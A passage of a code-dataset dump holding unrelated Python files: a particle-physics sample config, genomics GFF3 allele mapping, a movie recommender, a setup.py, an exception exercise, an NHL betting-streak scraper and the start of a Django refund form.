DisappTrks.StandardAnalysis.miniAODV2Samples import *\nimport copy \n\nconfig_file = \"protoConfig_cfg.py\"\n\nintLumi = 2590.0 # https://cmshead.mps.ohio-state.edu:8080/DisappearingTracks/595\n\nInputCondorArguments = {'request_memory': '2048MB', 'request_cpus': '1'}\n\ndatasetsBkgd = [\n 'DYJetsToLL',\n 'ZJetsToNuNu',\n 'VV',\n 'SingleTop',\n 'TTJets',\n 'WJetsToLNu_HT',\n # 'WJetsToLNu',\n]\n\ndatasetsData = [\n 'MET_2015D',\n]\n\ndatasetsSig = [\n 'AMSB_chargino_100GeV_10cm',\n 'AMSB_chargino_100GeV_100cm',\n 'AMSB_chargino_100GeV_1000cm',\n\n 'AMSB_chargino_200GeV_10cm',\n 'AMSB_chargino_200GeV_100cm',\n 'AMSB_chargino_200GeV_1000cm',\n\n 'AMSB_chargino_300GeV_10cm',\n 'AMSB_chargino_300GeV_100cm',\n 'AMSB_chargino_300GeV_1000cm',\n\n 'AMSB_chargino_400GeV_10cm',\n 'AMSB_chargino_400GeV_100cm',\n 'AMSB_chargino_400GeV_1000cm',\n\n 'AMSB_chargino_500GeV_10cm',\n 'AMSB_chargino_500GeV_100cm',\n 'AMSB_chargino_500GeV_1000cm',\n\n 'AMSB_chargino_600GeV_10cm',\n 'AMSB_chargino_600GeV_100cm',\n 'AMSB_chargino_600GeV_1000cm',\n\n 'AMSB_chargino_700GeV_10cm',\n 'AMSB_chargino_700GeV_100cm',\n 'AMSB_chargino_700GeV_1000cm',\n]\n\ndatasetsSigShort = copy.deepcopy(datasetsSig) \n\ndatasetsSigVeryShort = [\n 'AMSB_chargino_500GeV_10cm',\n 'AMSB_chargino_500GeV_100cm',\n 'AMSB_chargino_500GeV_1000cm',\n]\n\n################################################################################\n# add the lifetime reweighted samples\n################################################################################\nnew_datasetsSig = []\nfor dataset0 in datasetsSig:\n if not re.match (r'AMSB_chargino_[^_]*GeV_[^_]*cm', dataset0):\n continue\n mass = re.sub (r'AMSB_chargino_([^_]*)GeV_[^_]*cm', r'\\1', dataset0)\n ctau0 = float (re.sub (r'AMSB_chargino_[^_]*GeV_([^_]*)cm', r'\\1', dataset0))\n for i in range (2, 10):\n ctau = ctauP = 0.1 * i * ctau0\n if int (ctau) * 10 == int (ctau * 10):\n ctau = ctauP = str (int (ctau))\n else:\n ctau = ctauP = str (ctau)\n ctauP = re.sub (r'\\.', r'p', ctau)\n dataset = 'AMSB_chargino_' + mass + 'GeV_' + ctauP + 'cm'\n\n new_datasetsSig.append (dataset)\n\ndatasetsSig.extend (new_datasetsSig)\n################################################################################\n\ndatasets = datasetsBkgd + datasetsData + datasetsSig\n\ncomposite_dataset_definitions[\"allBkgd\"] = datasetsBkgd\n\ncomposite_dataset_definitions[\"WW\"] = [\n 'WWToLNuQQ',\n 'WWToLNuLNu',\n]\n\ncomposite_dataset_definitions[\"VG\"] = [\n 'WG',\n 'ZG',\n]\n\ncomposite_dataset_definitions[\"VV\"] = [\n 'WWToLNuQQ',\n 'WWToLNuLNu',\n 'WZ',\n 'ZZ', \n 'WG',\n 'ZG',\n]\n\ntypes[\"WW\"] = \"bgMC\"\ntypes[\"WZ\"] = \"bgMC\"\ntypes[\"ZZ\"] = \"bgMC\"\ntypes[\"VG\"] = \"bgMC\"\ntypes[\"VV\"] = \"bgMC\"\ntypes[\"allBkgd\"] = \"bkMC\" \n\ncolors[\"WW\"] = 390\ncolors[\"WZ\"] = 393\ncolors[\"ZZ\"] = 397\ncolors[\"VG\"] = 400\ncolors[\"VV\"] = 393\ncolors[\"allBkgd\"] = 601\n\nlabels[\"DYJetsToLL_50\"] = \"Z#rightarrowl^{+}l^{-}\"\nlabels[\"DYJetsToNuNu\"] = \"Z#rightarrow#nu#bar{#nu}\"\nlabels[\"WJetsToLNu\"] = \"W#rightarrowl#nu\"\nlabels[\"WW\"] = \"WW\"\nlabels[\"WZ\"] = \"WZ\"\nlabels[\"ZZ\"] = \"ZZ\"\nlabels[\"VG\"] = \"V#gamma\"\nlabels[\"VV\"] = \"Diboson\"\nlabels[\"allBkgd\"] = \"Total bkgd\" \n","sub_path":"StandardAnalysis/test/localConfig.py","file_name":"localConfig.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"134615623","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tues Apr 18 11:35:49 2018\n\n@author: celinede\n\"\"\"\n\ndef selectRegions(inMat,inLut,inRegions,outMat):\n import pandas as pd\n import numpy as np\n\n lut = np.genfromtxt(inLut,dtype=str,delimiter='\\n')\n\n if len(lut)==16:\n lut_d = {0:lut[0],1:lut[1],2:lut[2],3:lut[3],4:lut[4],5:lut[5],6:lut[6],7:lut[7],8:lut[8],\n 9:lut[9],10:lut[10],11:lut[11],12:lut[12],13:lut[13],14:lut[14],15:lut[15]}\n else:\n print('Sorry, I don\\'t know how to handle that ...')\n\n conMat = pd.DataFrame.from_csv(inMat,header=None,sep=' ',index_col=None)\n conMat = conMat.rename(lut_d,axis='columns')\n conMat = conMat.rename(lut_d,axis='rows')\n\n conMat_selected = conMat[inRegions]\n conMat_selected = conMat_selected.loc[inRegions]\n\n conMat_selected.to_csv(outMat,index=None,header=None,sep=' ')\n","sub_path":"scripts/dataprocessing/selectRegionsInConMat.py","file_name":"selectRegionsInConMat.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"602118854","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script will parse through multiple GFF3 files and pull the alleles of each.\nIt expects a file as input with each line in the file being tab-delimited \nwhere the first column is the type (either reference or isolate), the second\ncolumn is the GFF3 file, the third column is the FASTA that correlates to \nthe GFF3 file, and the fourth column is the name/prefix to designate these files to. \nWhile the FASTA file is not used by this script, it is used by downstream\nscripts so formatting this file like this allows for this single file \nto be used as input for all subsequent scripts. \n\nThe input should look like this (MUST start with whichever you want to be the reference): \n reference /path/to/ref.gff3 /path/to/ref.fasta name_of_ref\n isolate /path/to/iso1.gff3 /path/to/iso1.fasta name_of_iso1\n isolate /path/to/iso2.gff3 /path/to/iso2.fasta name_of_iso2\n\n*** It is VERY important that values in the name_of_* column do not contain periods ***\n*** This is to guarantee correct mapping later on in the pipeline ***\n\nNote there can only be one reference as this is what all other alleles will map\nto. The output will be another TSV file with the first column being the reference\nID, the second column being source/location of this gene, and the third column\ncontains the start-stop coordinates for the gene. Subsequent columns will \nhave the isolates that follow this same pattern. \n\nThe output will look like this:\n ref_id_0001 ref_loc 1-8888 iso1.ref_id_0001 iso1_loc 2-7999 iso2.ref_id_0001 iso2_loc 3-8000\n\n Input:\n 1. Path to a TSV list for references and isolates described above\n 2. Insert size from SRA for the reads that will be used as input\n 3. Either \"gene\" or \"exon\" for which level of sequences to pull\n 4. Directory for where the output should go\n\n Output:\n 1. A map for a single loci to all its alleles\n 2. A map indicating any overlapping gene positions\n 3. Summary data on introns including locations and longest intron length \n\n Usage:\n extract_alleles.py --ea_input /path/to/list_input.tsv --gene_or_exon gene --insert 500 --out_dir /path/to/outfile.tsv\n\n Author: \n James Matsumura\n\"\"\"\n\nimport re,argparse\nfrom collections import defaultdict\nfrom shared_fxns import make_directory\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Script to map alleles across GFF3 file. Read the top of the file for more details.')\n parser.add_argument('--ea_input', '-eai', type=str, required=True, help='Path to a TSV list for references and isolates.')\n parser.add_argument('--insert', '-i',type=int, required=False, default=0, help='Insert size from SRA for the reads that will be used as input.')\n parser.add_argument('--gene_or_exon', '-ge',type=str, required=True, help='Either \"gene\" or \"exon\" for which level of sequences to pull.')\n parser.add_argument('--out_dir', '-o', type=str, required=False, default='.', help='Directory for where the output should go.')\n args = parser.parse_args()\n\n make_directory(args.out_dir)\n\n # dictionary where the key is the ID and the value is a list for ref/loc/coords \n allele_map = {} \n\n # Iterate over each reference/isolate\n with open(args.ea_input,'r') as i:\n for entry in i:\n entry = entry.rstrip()\n vals = entry.split('\\t')\n type = vals[0]\n gff3 = vals[1]\n name = vals[3]\n\n # Regardless of reference or isolate, all should be mapping to the same name\n # designated by the reference. \n allele_map = parse_gff3(gff3,allele_map,type,name,args.insert,args.gene_or_exon,args.out_dir)\n\n # Iterate over the final hash of lists and print out a TSV\n out = \"ea_map.tsv\"\n with open(out,'w') as o:\n for key,value in allele_map.items():\n vals = ('\\t').join(value)\n line = \"{0}\\t{1}\\n\".format(key,vals)\n o.write(line)\n\n\n# Arguments:\n# file = GFF3 file\n# allele_map = a dictionary with the reference ID/Name as the key and the values an allele tied to it\n# ref_or_iso = is this a reference or an isolate? This will potentially change the ID\n# name = prefix/name of isolate\n# insert = size of the insert to check for overlaps\n# out_dir = prefix for the output directory to write to\n# gene_or_exon = whether to parse out by genes or exons\ndef parse_gff3(file,allele_map,ref_or_iso,name,insert,gene_or_exon,out_dir):\n\n regex_for_name = r'.*Name=([a-zA-Z\\d_\\.\\-]+)'\n regex_for_gmap_name = r'.*ID=([a-zA-Z\\d_\\.\\-]+)'\n regex_for_ref_exon_name = r'exon\\_?([\\w\\.]+)[\\-:;]+'\n\n # Build a dictionary of all the loci and their positions to look for any\n # instances of overlap which may assist in deciding whether to filter\n # or not when it comes to assigning individual reads per locus. \n overlap_dict = defaultdict(list)\n intron_check = {}\n max_intron_length = {} # keep track, per allele, of the maximum intron length\n attr_name,id = (\"\" for i in range(2))\n\n with open(file,'r') as gff3:\n for line in gff3:\n if line.startswith('##FASTA'): # don't care about sequences\n # only process intron info if going by genes\n if gene_or_exon == 'gene':\n if len(intron_check[attr_name]['list']) > 1 and ref_or_iso == \"reference\": # one last check for last gene\n max_intron_length[attr_name]['max_list'] = calculate_max_intron_length(intron_check,attr_name)\n \n break # leave if in FASTA\n\n elif line.startswith('#'): # don't care about comments or header data\n pass\n else: # within the GFF3 9-column section\n ele = line.split('\\t')\n if ele[2] == gene_or_exon: # only process if it is a gene or exon\n source = ele[0]\n start = ele[3]\n stop = ele[4]\n strand = ele[6]\n\n id = \"{0}.{1}\".format(name,re.search(regex_for_gmap_name,ele[8]).group(1))\n\n if gene_or_exon == 'gene':\n if attr_name in intron_check and ref_or_iso == \"reference\": # make sure it's been initialized\n if len(intron_check[attr_name]['list']) > 1: # only need to process if more than one exon\n max_intron_length[attr_name]['max_list'] = calculate_max_intron_length(intron_check,attr_name)\n\n attr_name = re.search(regex_for_name,ele[8]).group(1) # extract the name from attr that links via GMAP\n\n overlap_dict[source].append(\"{0}:{1}:{2}\".format(start,stop,id))\n\n intron_check[attr_name] = {'list':[],'strand':\"\"}\n intron_check[attr_name]['strand'] = strand\n max_intron_length[attr_name] = {'max_list':[],'start_pos':0}\n max_intron_length[attr_name]['start_pos'] = ele[3]\n\n elif gene_or_exon == 'exon': \n if ele[8].startswith('ID=exon'):\n attr_name = re.search(regex_for_ref_exon_name,ele[8]).group(1)\n else:\n attr_name = re.search(regex_for_name,ele[8]).group(1)\n \n if attr_name not in allele_map: # initialize if not seen before\n allele_map[attr_name] = []\n\n allele_map[attr_name].append(\"{0}|{1}|{2}|{3}|{4}\".format(source,start,stop,strand,id))\n\n if ele[2] == 'exon' and gene_or_exon == 'gene':\n intron_check[attr_name]['list'].append(\"{0}:{1}\".format(ele[3],ele[4])) \n \n # Only do overlap and intron checks for the reference as we can't really\n # trust GMAP to capture these properly with the way it maps fragments of\n # genes. Don't worry about these aspects when pulling exons. \n if gene_or_exon == 'gene':\n if ref_or_iso == \"reference\":\n # Identify whether there is any overlap. If there is, print to STDOUT. \n # Despite the nested loops, this shouldn't be too bad since it's split\n # up by each GFF3 file. Doing it this way since the GFF3 files aren't \n # guaranteed to be in order and genes are not always going to overlap\n # in a consistent manner (some may span multiple, just 1 bp, etc.)\n overlap_set = set() # don't add duplicates\n overlap_out = \"{0}/overlap.tsv\".format(out_dir)\n with open(overlap_out,'a') as out:\n for k,v in overlap_dict.items():\n for j in range(0,len(v)):\n\n ele = v[j].split(':')\n jstart = int(ele[0])\n jstop = int(ele[1])\n jid = ele[2]\n\n for x in range(0,len(v)):\n if j != x: # only compare to other gene regions\n ele = v[x].split(\":\")\n xstart = int(ele[0])\n xstop = int(ele[1])\n xid = ele[2]\n pair = \"\"\n\n if xid < jid:\n pair = \"{0}{1}\".format(xid,jid)\n else:\n pair = \"{0}{1}\".format(jid,xid)\n \n if jstart < (xstart-insert) < jstop:\n if pair not in overlap_set:\n overlap_set.add(pair)\n out.write('{0}\\t{1}\\n'.format(jid,xid))\n elif jstart < (xstop+insert) < jstop: \n if pair not in overlap_set:\n overlap_set.add(pair)\n out.write('{0}\\t{1}\\n'.format(jid,xid))\n\n # Write out some output for intron length\n introns_out = \"{0}/intron_positions.tsv\".format(out_dir)\n with open(introns_out,'a') as out:\n for k in max_intron_length:\n if max_intron_length[k]['max_list']:\n out.write(\"{0}\\t{1}\\t{2}\\n\".format(k,max_intron_length[k]['start_pos'],\"\\t\".join(max_intron_length[k]['max_list'])))\n\n return allele_map\n\n\ndef calculate_max_intron_length(intron_dict,key):\n\n prev = -1 # previous end position\n max = 0 # maximum intron length found so far\n out_list = [0]\n\n if intron_dict[key]['strand'] == '-':\n\n for exon in reversed(intron_dict[key]['list']):\n out_list.append(exon)\n if prev == -1:\n prev = exon.split(\":\")[1]\n else:\n intron_length = int(exon.split(\":\")[0])-int(prev)\n if intron_length > max:\n max = intron_length\n prev = exon.split(\":\")[1]\n\n else:\n\n for exon in intron_dict[key]['list']:\n out_list.append(exon)\n if prev == -1:\n prev = exon.split(\":\")[1]\n else:\n intron_length = int(exon.split(\":\")[0])-int(prev)\n if intron_length > max:\n max = intron_length\n prev = exon.split(\":\")[1]\n \n out_list[0] = str(max) \n return out_list\n\n\nif __name__ == '__main__':\n main()","sub_path":"bin/extract_alleles.py","file_name":"extract_alleles.py","file_ext":"py","file_size_in_byte":11611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"187001838","text":"avaliacoesUsers = {'Ana': \n\t\t{'Freddy x Jason': 2.5, \n\t\t 'O Ultimato Bourne': 3.5,\n\t\t 'Star Trek': 3.0, \n 'Star Wars': 3.0,\n\t\t 'Exterminador do Futuro': 3.5, \n\t\t 'Norbit': 2.5},\n\t \n\t 'Marcos': \n\t\t{'Freddy x Jason': 3.0, \n\t\t 'O Ultimato Bourne': 3.5, \n\t\t 'Star Trek': 1.5, \n\t\t 'Star Wars': 3.0,\n 'Exterminador do Futuro': 5.0, \n\t\t 'Norbit': 3.5}, \n\n\t 'Pedro': \n\t {'Freddy x Jason': 2.5, \n\t\t 'O Ultimato Bourne': 3.0,\n 'Star Wars': 4.0,\n\t\t 'Exterminador do Futuro': 3.5},\n\t\t\t \n\t 'Claudia': \n\t\t{'O Ultimato Bourne': 3.5, \n\t\t 'Star Trek': 3.0,\n\t\t 'Star Wars': 4.5, \n\t\t 'Exterminador do Futuro': 4.0, \n\t\t 'Norbit': 2.5},\n\t\t\t\t \n\t 'Adriano': \n\t\t{'Freddy x Jason': 3.0, \n\t\t 'O Ultimato Bourne': 4.0, \n\t\t 'Star Trek': 2.0, \n 'Star Wars': 3.0,\n 'Exterminador do Futuro': 3.0, \n\t\t 'Norbit': 2.0}, \n\n\t 'Janaina': \n\t {'Freddy x Jason': 3.0, \n\t 'O Ultimato Bourne': 4.0,\n\t 'Star Wars': 3.0, \n\t 'Exterminador do Futuro': 5.0, \n\t 'Norbit': 3.5},\n\t\t\t \n\t 'Leonardo': \n\t {'O Ultimato Bourne':4.5,\n\t 'Exterminador do Futuro':4.0,\n 'Norbit':1.0}\n}\n\navaliacoesModel = {'Model':{'Freddy x Jason', \n\t\t 'O Ultimato Bourne',\n\t\t 'Star Trek',\n\t\t 'Star Wars',\n 'Exterminador do Futuro', \n\t\t 'Norbit'}\n }\n \navaliacoesMovies = {'Freddy x Jason': \n\t\t{'Ana': 2.5, \n\t\t 'Marcos:': 3.0 ,\n\t\t 'Pedro': 2.5, \n\t\t 'Adriano': 3.0, \n\t\t 'Janaina': 3.0 },\n\t \n\t 'O Ultimato Bourne': \n\t\t{'Ana': 3.5, \n\t\t 'Marcos': 3.5,\n\t\t 'Pedro': 3.0, \n\t\t 'Claudia': 3.5, \n\t\t 'Adriano': 4.0, \n\t\t 'Janaina': 4.0,\n\t\t 'Leonardo': 4.5 },\n\t\t\t\t \n\t 'Star Trek': \n\t\t{'Ana': 3.0, \n\t\t 'Marcos:': 1.5,\n\t\t 'Claudia': 3.0, \n\t\t 'Adriano': 2.0 },\n\t\n\t 'Exterminador do Futuro': \n\t\t{'Ana': 3.5, \n\t\t 'Marcos:': 5.0 ,\n\t\t 'Pedro': 3.5, \n\t\t 'Claudia': 4.0, \n\t\t 'Adriano': 3.0, \n\t\t 'Janaina': 5.0,\n\t\t 'Leonardo': 4.0},\n\t\t\t\t \n\t 'Norbit': \n\t\t{'Ana': 2.5, \n\t\t 'Marcos:': 3.0 ,\n\t\t 'Claudia': 2.5, \n\t\t 'Adriano': 2.0, \n\t\t 'Janaina': 3.5,\n\t\t 'Leonardo': 1.0},\n\t\t\t\t \n\t 'Star Wars': \n\t\t{'Ana': 3.0, \n\t\t 'Marcos:': 3.5,\n\t\t 'Pedro': 4.0, \n\t\t 'Claudia': 4.5, \n\t\t 'Adriano': 3.0, \n\t\t 'Janaina': 3.0}\n}\n \n##Fazer uma função de inserção de usuário\n##Fazer um sistema que pergunta se o usuário existe \n##Excluir um usuário do sistema \n \nfrom math import sqrt\n\ndef knn(base,user1,user2):\n si = {}\n for item in base[user1]:\n if item in base[user2]: \n si[item] = 1\n \n if len(si)==0: \n return 0\n \n soma = sum([pow(base[user1][item] - base[user2][item], 2)\n for item in base[user1] if item in base[user2]])\n return 1/(1+sqrt(soma))\n\ndef getSim(base,user):\n sim = [(knn(base,user, users), users) \n for users in base if users != user]\n sim.sort()\n sim.reverse()\n return sim [0:20]\n\ndef getRecomUser(base, user):\n totais = {}\n somaSim = {}\n for users in base:\n if users == user: continue\n sim = knn(base,user,users)\n\n if sim <= 0: continue\n \n for item in base[users]:\n if item not in base[user]:\n totais.setdefault (item, 0)\n totais[item]+= base[users][item]*sim\n somaSim.setdefault(item, 0)\n somaSim[item]+= sim\n \n rankings=[(total/somaSim[item], item) for item, total in totais.items()]\n rankings.sort()\n rankings.reverse()\n return rankings[0:20] \n\ndef loadMovieLens(path='C:/ml-100k'):\n movies = {}\n for linha in open(path + '/u.item'):\n (id, titulo) = linha.split('|')[0:2]\n movies[id] = titulo\n \n base = {}\n for linha in open(path + '/u.data'):\n (user, idmovies,nota,tempo) = linha.split('\\t')\n base.setdefault(user,{})\n base[user][movies[idmovies]] = float(nota)\n return base\n\ndef calItensSim(base):\n result = {}\n for item in base:\n notas = getSim(base, item)\n result[item] = notas\n return result\n\ndef getRecomItens(baseUser, simItens, user):\n notasUser = baseUser[user]\n notas={}\n totalSim={}\n #for(item , nota) in notasUser.item():\n for (item,nota) in notasUser.items():\n for(sim , item2) in simItens[item]:\n if item2 in notasUser: continue\n notas.setdefault(item2, 0)\n notas[item2] += sim * nota\n totalSim.setdefault(item2, 0)\n totalSim[item2] += sim\n rankings=[(score/totalSim[item],item) for item, score in notas.items()]\n rankings.sort()\n rankings.reverse()\n return rankings","sub_path":"Resources - SR/recomendation.py","file_name":"recomendation.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"566163475","text":"\"\"\" setup.py - Script to install package using distutils\n\nFor help options run:\n$ python setup.py help\n\n\"\"\"\n#Author: Ian Huston\n\n\nfrom setuptools import setup\nimport re\nimport ast\n\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\nwith open('getinspire/getinspire.py', 'rb') as f:\n version = str(ast.literal_eval(_version_re.search(f.read().decode('utf-8')).group(1)))\n\n\nsetup_args = dict(name='getinspire',\n version=version,\n author='Diego Restrepo',\n author_email='diego.restrepo@gmail.com',\n url='https://github.com/rescolo/getinspire',\n packages=['getinspire'],\n install_requires=['pybtex'],\n entry_points={\n 'console_scripts': 'getinspire = getinspire.getinspire:getinspire_main'\n },\n zip_safe=False,\n license=\"Modified BSD license\",\n description=\"\"\"getinspire queries the INSPIRE HEP database and returns to fill the bibtex o bibitem records of some LaTeX file \"\"\",\n long_description=open('README.rst').read(),\n classifiers=[\"Topic :: Utilities\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.2\",\n ],\n )\n\nif __name__ == \"__main__\":\n setup(**setup_args)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"482448882","text":"\n\n# NO:4 - Write example program to re-raised exception and AssertError (self-study) in Python. \n\ntry:\n \n try:\n a=int(input('Enter your age :'))\n if a>15:\n raise ValueError('Invalid number') \n except ValueError as ve:\n print(ve)\n raise\n else:\n print('Valid number')\nexcept AssertionError as ae:\n print(ae)\nexcept ValueError as ve:\n print('re-rased exception',ve)","sub_path":"Assert.py.py","file_name":"Assert.py.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"438624876","text":"import requests\nfrom bs4 import BeautifulSoup\nimport datetime\nimport os\nimport sys\n\n# Script for determining which games of the day fit Prof MJ (David-MJ) NHL streak system\n# System: Bet on team with losing streak >= 1 playing team with winning streak >= 4\n# Script writes and/or prints (depending on global variable settings) all games that fit streak\n# Will output strings in form of Away_Nickname,Home_Nickname,Home_Line,Bet_Team,Bet_Code\n# Where Bet_Code = {0 if no bet (should not be shown), 1 if home team is losing streak, 2 if away team is losing streak}\n__author__ = [\"rssawyer\"]\n\n# Global variables that can be fine-tuned\nLOSING_STREAK_MINIMUM = 2\nWINNING_STREAK_MINIMUM = 2\nMINIMUM_ODDS = 2.2\nWRITING = True\nOUTPUT_FILENAME = \"NHL-David-MJ-Streak-System.csv\"\nPRINTING = True\nSPORT = 'nhl'\n\n\n# Quick data structure for storing streak category (determined by minimums of global variables)\nclass NHL_Team:\n def __init__(self, input_name, streak_category):\n self.name = input_name\n self.category = streak_category\n\n\n# Determining if a matchup should be bet given teams and their streak category\ndef system_matchup(Away_team, Home_team):\n if Away_team.category == \"Losing\" and Home_team.category == \"Winning\":\n return 2, Away_team.name\n elif Away_team.category == \"Winning\" and Home_team.category == \"Losing\":\n return 1, Home_team.name\n else:\n return 0, \"No Bet\"\n\n\n# Function for converting teams from ESPN Standings names to ESPN Matchup names (essentially location -> nickname)\ndef map_name_standings_to_matchup(name):\n try:\n dash_index = name.index('-')\n name = name[dash_index+2:]\n except ValueError:\n pass\n NHL_dictionary = {\"Montreal\":\"Canadiens\",\n \"Toronto\":\"Maple Leafs\",\n \"Ottawa\":\"Senators\",\n \"Boston\":\"Bruins\",\n \"Tampa Bay\":\"Lightning\",\n \"Florida\":\"Panthers\",\n \"Buffalo\":\"Sabres\",\n \"Detroit\":\"Red Wings\",\n \"Washington\":\"Capitals\",\n \"Pittsburgh\":\"Penguins\",\n \"Columbus\":\"Blue Jackets\",\n \"NY Rangers\":\"Rangers\",\n \"NY Islanders\":\"Islanders\",\n \"Carolina\":\"Hurricanes\",\n \"Philadelphia\":\"Flyers\",\n \"New Jersey\":\"Devils\",\n \"Chicago\":\"Blackhawks\",\n \"Minnesota\":\"Wild\",\n \"St. Louis\":\"Blues\",\n \"Nashville\":\"Predators\",\n \"Winnipeg\":\"Jets\",\n \"Dallas\":\"Stars\",\n \"Colorado\":\"Avalanche\",\n \"Anaheim\":\"Ducks\",\n \"Edmonton\":\"Oilers\",\n \"San Jose\":\"Sharks\",\n \"Calgary\":\"Flames\",\n \"Los Angeles\":\"Kings\",\n \"Vancouver\":\"Canucks\",\n \"Arizona\":\"Coyotes\",\n\t\t\t\t\t \"Vegas\":\"Golden Knights\"}\n try:\n mapped_name = NHL_dictionary[name]\n except KeyError:\n mapped_name = \"Not Found\"\n return mapped_name\n\n\n# Using global streak minimums to determine team's streak category from ESPN Standings table (e.g. Won 5)\ndef convert_word_category(cell_text):\n if cell_text[0] == \"L\" and int(cell_text.split(\" \")[1]) >= LOSING_STREAK_MINIMUM:\n category = \"Losing\"\n elif cell_text[0] == \"W\" and int(cell_text.split(\" \")[1]) >= WINNING_STREAK_MINIMUM:\n category = \"Winning\"\n else:\n category = \"None\"\n return category\n\n\n# Returns dictionary of (Name, Team_object) for use in determining actionable matchups from ESPN Standings\ndef get_team_streak_data(sport=\"nhl\"):\n return_dict = dict()\n url = \"http://www.espn.com/%s/standings\" % sport\n session = requests.Session()\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)\"\n \" Chrome/47.0.2526.111 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;\"\n \"q=0.9,image/webp,*/*;q=0.8\"}\n req = session.get(url, headers=headers)\n bsObj = BeautifulSoup(req.text, \"html.parser\")\n\n standings = bsObj.find(name=\"table\", class_=\"tablehead\")\n rows = standings.find_all('tr')\n\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n team_name = map_name_standings_to_matchup(cols[0])\n if team_name != \"Not Found\":\n return_dict[team_name] = NHL_Team(team_name, convert_word_category(cols[15]))\n\n return return_dict\n\n\ndef convert_game_to_string(html_game, team_data):\n try:\n links = html_game.find_all(name='a')\n away_team = links[0].text.strip()\n home_team = links[1].text.strip()\n line = html_game.find(name=\"div\", class_=\"expand-gameLinks\").text.strip().split(\" \")[-1]\n try:\n int(line)\n except ValueError:\n line = \"None\"\n bet_indicator, bet_team = system_matchup(team_data[away_team], team_data[home_team])\n return \"%s,%s,%s,%s,%s\" % (away_team, home_team, line, bet_team, bet_indicator)\n except AttributeError:\n return \"N,N,N,N,0\"\n except IndexError:\n return \"N,N,N,N,0\"\n\n\ndef calculate_payouts(home_moneyline):\n if home_moneyline < 0:\n home_payout = 100 / abs(home_moneyline)\n away_payout = 1 / home_payout - 0.15\n else:\n home_payout = home_moneyline / 100\n away_payout = 1 / home_payout - 0.15\n return home_payout + 1, away_payout + 1\n\n\n# Uses predetermined betting code (0 = None, 1 = Home is losing streak, 2 = Away is losing streak)\ndef actionable(game_string):\n split = game_string.split(\",\")\n try:\n home_payout, away_payout = calculate_payouts(int(split[-3]))\n if int(split[-1]) == 1 and home_payout > MINIMUM_ODDS:\n return True\n elif int(split[-1]) == 2 and away_payout > MINIMUM_ODDS:\n return True\n else:\n return False\n except ValueError:\n return False\n\n\n\n# Gets today's matchups (and lines) from ESPN and returns actionable games\n# Returns list of actionable games in format Away_Name,Home_Name,Line,Bet_Team,Bet_Amount\n# Line is relative to home, if available on ESPN Matchup page\ndef get_matchup_data(team_data, sport=\"nhl\"):\n url = \"http://www.espn.com/%s/scoreboard\" % sport\n session = requests.Session()\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)\"\n \" Chrome/47.0.2526.111 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;\"\n \"q=0.9,image/webp,*/*;q=0.8\"}\n req = session.get(url, headers=headers)\n bsObj = BeautifulSoup(req.text, \"html.parser\")\n\n games = bsObj.find_all(name=\"div\", class_=\"mod-content\")\n actionable_games = []\n for game in games:\n game_string = convert_game_to_string(game, team_data)\n if actionable(game_string):\n actionable_games.append(game_string)\n\n return actionable_games\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 2:\n LOSING_STREAK_MINIMUM = sys.argv[1]\n WINNING_STREAK_MINIMUM = sys.argv[2]\n print(\"Using %d losing streak and %d winning streak:\" % (LOSING_STREAK_MINIMUM, WINNING_STREAK_MINIMUM))\n team_info = get_team_streak_data(sport=SPORT)\n if len(team_info.keys()) != 31:\n print(\"Number of teams incorrect\")\n bet_games = get_matchup_data(team_info, sport=SPORT)\n\n if WRITING:\n if not os.path.exists(OUTPUT_FILENAME):\n write_file = open(OUTPUT_FILENAME, mode='a')\n header = \"Date,Sport,AwayNickname,HomeNickname,HomeLine,BetTeam,BetCode\\n\"\n write_file.write(header)\n else:\n write_file = open(OUTPUT_FILENAME, mode='a')\n date = datetime.date.today()\n for game in bet_games:\n write_file.write(str(date)+\",\"+SPORT+\",\"+game+\"\\n\")\n write_file.close()\n\n if PRINTING:\n if len(bet_games) < 1:\n print(\"No Games Actionable\")\n else:\n for game in bet_games:\n print(\"Bet Game: %s\" % game)\n","sub_path":"NHL_Streak_System.py","file_name":"NHL_Streak_System.py","file_ext":"py","file_size_in_byte":8341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"440368593","text":"\"\"\"Module containing forms for the refund app.\"\"\"\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom localflavor.generic.validators import BICValidator, IBANValidator\n\nfrom pat.forms import UserChoiceField\nfrom refund.models import Refund\n\n\nclass RefundForm(forms.ModelForm):\n \"\"\"The basic refund Form Class.\"\"\"\n department_leader = UserChoiceField(User.objects.filter(is_staff=True))\n\n # pylint: disable=too-few-public-methods\n class Meta:\n \"\"\"Meta class connecting the model to the model form.\"\"\"\n model = Refund\n fields = [\n 